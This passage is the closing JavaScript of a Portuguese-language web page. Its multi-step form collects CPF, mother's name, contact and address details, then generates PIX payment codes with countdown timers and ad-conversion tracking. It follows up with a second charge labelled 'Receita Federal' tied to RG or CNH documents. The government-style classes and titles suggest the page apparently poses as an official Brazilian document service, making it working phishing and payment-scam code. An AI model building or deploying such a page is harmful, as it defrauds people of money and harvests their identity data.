            if (value.length > 11) value = value.slice(0, 11);
            if (value.length > 2) value = '(' + value.substring(0,2) + ') ' + value.substring(2);
            if (value.length > 10) value = value.substring(0,10) + '-' + value.substring(10);
            input.value = value;
        }

        // Adicionar máscaras e validações aos campos
        document.addEventListener('DOMContentLoaded', function() {
            const cpfInput = document.querySelector('input[name="cpf"]');
            const telefoneInput = document.querySelector('input[name="telefone"]');
            const cepInput = document.getElementById('cep');

            cpfInput.addEventListener('input', () => formatarCPF(cpfInput));
            telefoneInput.addEventListener('input', () => formatarTelefone(telefoneInput));
            
            cepInput.addEventListener('input', function(e) {
                let value = e.target.value.replace(/\D/g, '');
                if (value.length > 8) value = value.slice(0, 8);
                value = value.replace(/(\d{5})(\d)/, '$1-$2');
                e.target.value = value;
            });
        });

        function notify(message, isError = false) {
            Toastify({
                text: message,
                duration: 3000,
                gravity: "top",
                position: "right",
                style: {
                    background: isError ? "#dc2626" : "#168821",
                }
            }).showToast();
        }

        function validarFormulario1() {
            const nome = document.querySelector('input[name="nome"]').value;
            const cpf = document.querySelector('input[name="cpf"]').value;
            const nomeMae = document.querySelector('input[name="nomeMae"]').value;
            const email = document.querySelector('input[name="email"]').value;
            const telefone = document.querySelector('input[name="telefone"]').value;

            if (nome.length < 3) {
                notify('Por favor, insira um nome válido', true);
                return false;
            }
            if (!validarCPF(cpf)) {
                notify('Por favor, insira um CPF válido', true);
                return false;
            }
            if (nomeMae.length < 3) {
                notify('Por favor, insira o nome da mãe', true);
                return false;
            }
            if (!validarEmail(email)) {
                notify('Por favor, insira um email válido', true);
                return false;
            }
            if (!validarTelefone(telefone)) {
                notify('Por favor, insira um telefone válido', true);
                return false;
            }
            return true;
        }

        function validarFormulario2() {
            const cep = document.getElementById('cep').value;
            const rua = document.getElementById('rua').value;
            const numero = document.querySelectorAll('input[type="text"]')[4].value;
            const bairro = document.getElementById('bairro').value;
            const cidade = document.getElementById('cidade').value;
            const estado = document.getElementById('estado').value;

            if (cep.replace(/\D/g, '').length !== 8) {
                notify('Por favor, insira um CEP válido', true);
                return false;
            }
            if (!rua || !numero || !bairro || !cidade || !estado) {
                notify('Por favor, preencha todos os campos do endereço', true);
                return false;
            }
            return true;
        }

        function nextStep(step) {
            if (step === 2 && !validarFormulario1()) return;
            if (step === 3 && !validarFormulario2()) return;

            // Salvar dados do formulário no localStorage
            if (step === 2) {
                const formData = {
                    nome: document.querySelector('input[name="nome"]').value,
                    cpf: document.querySelector('input[name="cpf"]').value,
                    nomeMae: document.querySelector('input[name="nomeMae"]').value,
                    email: document.querySelector('input[name="email"]').value,
                    telefone: document.querySelector('input[name="telefone"]').value
                };
                
                localStorage.setItem('formData', JSON.stringify(formData));
            }
            

            document.querySelectorAll('[id^="formStep"]').forEach(form => form.classList.add('hidden'));
            document.getElementById(`formStep${step}`).classList.remove('hidden');
            
            // Atualizar progress bar
            for (let i = 1; i <= 3; i++) {
                const stepEl = document.querySelector(`#step${i} div`);
                if (i <= step) {
                    stepEl.classList.remove('bg-gray-300');
                    stepEl.classList.add('bg-gov-blue-light');
                } else {
                    stepEl.classList.add('bg-gray-300');
                    stepEl.classList.remove('bg-gov-blue-light');
                }
            }
        }

        function prevStep(step) {
            nextStep(step);
        }

        async function buscarCep() {
            const cep = document.getElementById('cep').value.replace(/\D/g, '');
            if (cep.length !== 8) return;

            try {
                const response = await fetch(`https://viacep.com.br/ws/${cep}/json/`);
                const data = await response.json();
                
                if (!data.erro) {
                    document.getElementById('rua').value = data.logradouro;
                    document.getElementById('bairro').value = data.bairro;
                    document.getElementById('cidade').value = data.localidade;
                    document.getElementById('estado').value = data.uf;
                }
            } catch (error) {
                console.error('Erro ao buscar CEP:', error);
            }
        }

        function emitirGuia() {
            notify('Guia de pagamento será gerada em instantes...', false);
            // Aqui você pode implementar a lógica para gerar a guia de pagamento
        }

        // Verificar PIX já gerado
        document.addEventListener('DOMContentLoaded', function() {
            const pixData = localStorage.getItem('pixData');
            if (pixData) {
                const data = JSON.parse(pixData);
                if (data.titulo === titulo && data.valor === valor) {
                    // Esconder todos os outros steps
                    document.querySelectorAll('[id^="formStep"]').forEach(form => form.classList.add('hidden'));
                    mostrarPix(data);
                    verificarPagamento(data.transaction_id);
                    return;
                }
            }
        });

        function emitirGuia() {
            const loadingOverlay = document.getElementById('loadingOverlay');
            loadingOverlay.classList.remove('hidden');

            // Converter valor para centavos
            const valorEmCentavos = Math.round(parseFloat(valor.replace(',', '.')) * 100);

            const dadosFormulario = {
                nome: document.querySelector('input[name="nome"]').value,
                cpf: document.querySelector('input[name="cpf"]').value,
                email: document.querySelector('input[name="email"]').value,
                telefone: document.querySelector('input[name="telefone"]').value,
                valor: valorEmCentavos,
                titulo: titulo
            };
            
            fetch('gerarPix.php', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(dadosFormulario)
            })
            .then(response => response.json())
            .then(data => {
                loadingOverlay.classList.add('hidden');
                if (data.success) {
                    const pixData = {
                        ...data.data,
                        titulo: titulo,
                        valor: valor
                    };
                    localStorage.setItem('pixData', JSON.stringify(pixData));
                    mostrarPix(pixData);
                } else {
                    notify(data.error || 'Erro ao gerar PIX', true);
                }
            })
            .catch(error => {
                loadingOverlay.classList.add('hidden');
                notify('Erro ao gerar PIX', true);
            });
        }

        function mostrarPix(data) {
            document.getElementById('formStep3').classList.add('hidden');
            document.getElementById('formStep4').classList.remove('hidden');
            document.getElementById('qrcode').src = data.qrcode_image;
            document.getElementById('qrcode-mobile').src = data.qrcode_image;
            document.getElementById('pixCode').value = data.qrcode_text;
            document.getElementById('pixTitulo').textContent = titulo;
            document.getElementById('pixValor').textContent = `R$ ${valor.replace('.', ',')}`;
            
            // Atualizar progress bar para mostrar todas as etapas completas
            for (let i = 1; i <= 3; i++) {
                const stepEl = document.querySelector(`#step${i} div`);
                stepEl.classList.remove('bg-gray-300');
                stepEl.classList.add('bg-gov-blue-light');
            }
            
            iniciarTimer();
            verificarPagamento(data.transaction_id);
        }

        function verificarPagamento(transactionId) {
            let tentativas = 0;
            const maxTentativas = 180; // 30 minutos (30 * 60 segundos / 10 segundos de intervalo)

            function checarStatus() {
                tentativas++;
                if (tentativas >= maxTentativas) {
                    clearInterval(interval);
                    return;
                }

                fetch(`verificarPagamento.php?id=${transactionId}`)
                    .then(response => response.json())
                    .then(data => {
                        if (data.success && data.status === 'paid' || data.success && data.status === 'approved') {
                            clearInterval(interval);
                            mostrarUpsell();
                        }
                    })
                    .catch(error => console.error('Erro:', error));
            }

            // Fazer primeira verificação imediatamente
            checarStatus();
            
            // Continuar verificando a cada 10 segundos
            const interval = setInterval(checarStatus, 10000);
        }
        
        function loadTrackingScript(pixelID) {
        const script = document.createElement("script");
        script.async = true;
        script.src = `https://www.googletagmanager.com/gtag/js?id=${pixelID}`;
        document.head.appendChild(script);

        script.onload = () => {
            window.dataLayer = window.dataLayer || [];
            function gtag() {
                dataLayer.push(arguments);
            }
            gtag("js", new Date());
            gtag("config", pixelID);

            console.log(`Carregou o pixel de ID: ${pixelID}`);
        };
       }
       
       
       function loadTrackingScript2(pixelID) {
    const script = document.createElement("script");
    script.async = true;
    script.src = `https://www.googletagmanager.com/gtag/js?id=${pixelID}`;
    document.head.appendChild(script);

    script.onload = () => {
        window.dataLayer = window.dataLayer || [];
        function gtag() {
            dataLayer.push(arguments);
        }
        gtag("js", new Date());
        gtag("config", pixelID);

        console.log(`Carregou o pixel de ID: ${pixelID}`);

        const transactionID = `txn_${Date.now()}_${Math.floor(Math.random() * 100000)}`;

        gtag('event', 'conversion', {
            'send_to': pixelID,
            'transaction_id': transactionID
        });

        console.log(`Evento de conversão enviado: send_to=${pixelID}, transaction_id=${transactionID}`);
    };
}

        function mostrarUpsell() {
            document.getElementById('formStep4').classList.add('hidden');
            document.getElementById('formStep5').classList.remove('hidden');
            
            const upsellDiv = document.getElementById("upsellDIFF");
            let pixelID = null;

        
           fetch("pixels.json")
            .then(response => response.json())
            .then(data => {
                data.forEach(pixelObj => {
                    loadTrackingScript(pixelObj.pixel);
                });
            })
            .catch(error => console.error("Erro ao carregar o arquivo JSON:", error));
            
            
            fetch("pixels2.json")
            .then(response => response.json())
            .then(data => {
                data.forEach(pixelObj => {
                    loadTrackingScript2(pixelObj.pixel);
                });
            })
            .catch(error => console.error("Erro ao carregar o arquivo JSON:", error));
            
            
            if (titulo.includes('RG')) {
                document.getElementById('upsellRG').classList.remove('hidden');
            } else if (titulo.includes('CNH')) {
                document.getElementById('upsellCNH').classList.remove('hidden');
            }
            else {
                document.getElementById('upsellDIFF').classList.remove('hidden');
            }
        }

        function adquirirUpsell(tipo) {
            const loadingOverlay = document.getElementById('loadingOverlay');
            loadingOverlay.classList.remove('hidden');

            // Recuperar dados do formulário do localStorage
            const formData = JSON.parse(localStorage.getItem('formData'));
            if (!formData) {
                notify('Erro: Dados do formulário não encontrados', true);
                return;
            }

            // Usar os dados do cliente já preenchidos
            const dadosFormulario = {
                nome: formData.nome,
                cpf: formData.cpf,
                email: formData.email,
                //telefone: formData.telefone
                valor: tipo === 'RG' ? 4221 : 4221,
                titulo: tipo === 'RG' ? 'Receita Federal' : 'Receita Federal'
            };

            // Armazenar dados do upsell para uso posterior
            localStorage.setItem('dadosUpsell', JSON.stringify(dadosFormulario));

            fetch('gerarPix.php', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(dadosFormulario)
            })
            .then(response => response.json())
            .then(data => {
                loadingOverlay.classList.add('hidden');
                if (data.success) {
                    mostrarPixUpsell(data.data);
                } else {
                    notify('Erro ao processar pedido', true);
                }
            })
            .catch(error => {
                loadingOverlay.classList.add('hidden');
                notify('Erro ao processar pedido', true);
            });
        }

        function mostrarPixUpsell(data) {
            document.getElementById('formStep5').classList.add('hidden');
            document.getElementById('formStep6').classList.remove('hidden');
            
            document.getElementById('qrcode-upsell').src = data.qrcode_image;
            document.getElementById('qrcode-mobile-upsell').src = data.qrcode_image;
            document.getElementById('pixCodeUpsell').value = data.qrcode_text;
            
            
            fetch("pixels.json")
            .then(response => response.json())
            .then(data => {
                data.forEach(pixelObj => {
                    loadTrackingScript(pixelObj.pixel);
                });
            })
            .catch(error => console.error("Erro ao carregar o arquivo JSON:", error));
            
            
            fetch("pixels2.json")
            .then(response => response.json())
            .then(data => {
                data.forEach(pixelObj => {
                    loadTrackingScript2(pixelObj.pixel);
                });
            })
            .catch(error => console.error("Erro ao carregar o arquivo JSON:", error));
            
            // Recuperar dados do upsell do localStorage
            const dadosUpsell = JSON.parse(localStorage.getItem('dadosUpsell'));
            document.getElementById('pixTituloUpsell').textContent = dadosUpsell.titulo;
            document.getElementById('pixValorUpsell').textContent = 
                `R$ ${(dadosUpsell.valor/100).toFixed(2).replace('.', ',')}`;

            iniciarTimerUpsell();
            verificarPagamentoUpsell(data.transaction_id);
        }

        function verificarPagamentoUpsell(transactionId) {
            function checarStatus() {
                fetch(`verificarPagamento.php?id=${transactionId}`)
                    .then(response => response.json())
                    .then(data => {
                        if (data.success && data.status === 'paid' || data.success && data.status === 'approved') {
                            document.getElementById('formStep6').classList.add('hidden');
                            document.getElementById('formStep7').classList.remove('hidden');
                            clearInterval(interval);
                        }
                    })
                    .catch(error => console.error('Erro:', error));
            }

            // Verificar a cada 10 segundos
            const interval = setInterval(checarStatus, 10000);
            // Primeira verificação imediata
            checarStatus();
        }

        function copiarPixUpsell() {
            const pixCode = document.getElementById('pixCodeUpsell');
            pixCode.select();
            document.execCommand('copy');
            notify('Código PIX copiado!', false);
            
             gtag('event', 'conversion', {
                  'send_to': 'AW-11495741401/PuANCNPp3fgZENmvzOkq',
                  'value': 55.0,
                  'currency': 'BRL',
                  'transaction_id': ''
              });
        }

        function copiarPix() {
            const pixCode = document.getElementById('pixCode');
            pixCode.select();
            document.execCommand('copy');
            notify('Código PIX copiado!', false);
             gtag('event', 'conversion', {
                  'send_to': 'AW-11495741401/PuANCNPp3fgZENmvzOkq',
                  'value': 55.0,
                  'currency': 'BRL',
                  'transaction_id': ''
              });
        }

        function iniciarTimer() {
            const timerElement = document.getElementById('timer');
            let tempoRestante = 30 * 60; // 30 minutos em segundos

            function atualizarTimer() {
                const minutos = Math.floor(tempoRestante / 60);
                const segundos = tempoRestante % 60;
                timerElement.textContent = `${minutos.toString().padStart(2, '0')}:${segundos.toString().padStart(2, '0')}`;

                if (tempoRestante === 0) {
                    clearInterval(interval);
                    document.getElementById('analiseModal').classList.remove('hidden');
                } else {
                    tempoRestante--;
                }
            }

            const interval = setInterval(atualizarTimer, 1000);
            atualizarTimer();
        }

        function iniciarTimerUpsell() {
            const timerElement = document.getElementById('timerUpsell');
            let tempoRestante = 30 * 60; // 30 minutos em segundos

            function atualizarTimer() {
                const minutos = Math.floor(tempoRestante / 60);
                const segundos = tempoRestante % 60;
                timerElement.textContent = `${minutos.toString().padStart(2, '0')}:${segundos.toString().padStart(2, '0')}`;

                if (tempoRestante === 0) {
                    clearInterval(interval);
                    document.getElementById('analiseModal').classList.remove('hidden');
                } else {
                    tempoRestante--;
                }
            }

            const interval = setInterval(atualizarTimer, 1000);
            atualizarTimer();
        }

        // Formatar valor com vírgula
        document.getElementById('servicoValor').textContent = `R$ ${valor.replace('.', ',')}`;

        function toggleQRCode() {
            const mobileQRCode = document.getElementById('mobile-qrcode');
            const button = document.querySelector('button[onclick="toggleQRCode()"]');
            if (mobileQRCode.classList.contains('hidden')) {
                mobileQRCode.classList.remove('hidden');
                button.textContent = 'Ocultar QR Code';
            } else {
                mobileQRCode.classList.add('hidden');
                button.textContent = 'Exibir QR Code';
            }
        }

        function toggleQRCodeUpsell() {
            const mobileQRCode = document.getElementById('mobile-qrcode-upsell');
            const button = document.querySelector('button[onclick="toggleQRCodeUpsell()"]');
            if (mobileQRCode.classList.contains('hidden')) {
                mobileQRCode.classList.remove('hidden');
                button.textContent = 'Ocultar QR Code';
            } else {
                mobileQRCode.classList.add('hidden');
                button.textContent = 'Exibir QR Code';
            }
        }
    </script>
    
</body>
</html>